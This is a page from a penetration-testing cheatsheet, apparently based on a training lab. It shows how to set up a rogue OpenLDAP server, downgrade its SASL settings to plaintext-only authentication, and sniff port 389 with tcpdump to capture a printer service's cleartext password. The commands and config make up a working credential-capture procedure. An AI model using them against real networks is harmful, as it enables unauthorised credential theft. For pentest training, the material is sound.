> For the complete documentation index, see [llms.txt](https://lanzt.gitbook.io/cheatsheet-pentest/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lanzt.gitbook.io/cheatsheet-pentest/windows-things/active-directory-methodology/attacks/ldap-authentication/rogue-ldap-server.md).

# Rogue LDAP Server

```bash
sudo apt install slapd ldap-utils
sudo systemctl enable slapd
```

```bash
sudo dpkg-reconfigure -p low slapd
```

* Omit initial configuration?: `No`
* DNS domain name: `target domain`
* Organization name: `target domain`
* Administrator password: `anything, but remember it`
* Database removed?: `No`
* Move old database?: `Yes`

```bash
Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.
```

> Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms. We want to ensure that our LDAP server only supports PLAIN and LOGIN authentication methods. To do this, we need to create a new ldif file, called with the following content:

```bash
cat ./olcSaslSecProps.ldif
```

```bash
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```

* olcSaslSecProps: Specifies the SASL security properties
* noanonymous: Disables mechanisms that support anonymous login
* minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.

{% embed url="<https://www.netiq.com/es-es/documentation/edir88/edir88tshoot/data/bq0e8eo.html>" %}

## Update configuration

```bash
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart
```

<figure><img src="/files/Fyc3JXnqWxq7NR866YDr" alt=""><figcaption></figcaption></figure>

## Verify configuration

```bash
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
```

<figure><img src="/files/w7d2qvJePlFkFBdwo9J4" alt=""><figcaption></figcaption></figure>

We have our LDAP server running under the 389 port.

## Capturing LDAP Credentials

```bash
sudo tcpdump -SX -i breachad tcp port 389
```

```
   -S
   --absolute-tcp-sequence-numbers
          Print absolute, rather than relative, TCP sequence numbers.
          
   -X     When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and  ASCII.
          This is very handy for analysing new protocols.  In the current implementation this flag may have the same effect as -XX if the packet is truncated.
```

<figure><img src="/files/hgDMisJZCvBCZ9zSFfjB" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/4m0ysQVseKvCK1xuVw1d" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Dc8ugbEeniHR4mE5HZ77" alt=""><figcaption></figcaption></figure>

And we are able to retrieve the plain text password used for the Printer Service against LDAP.
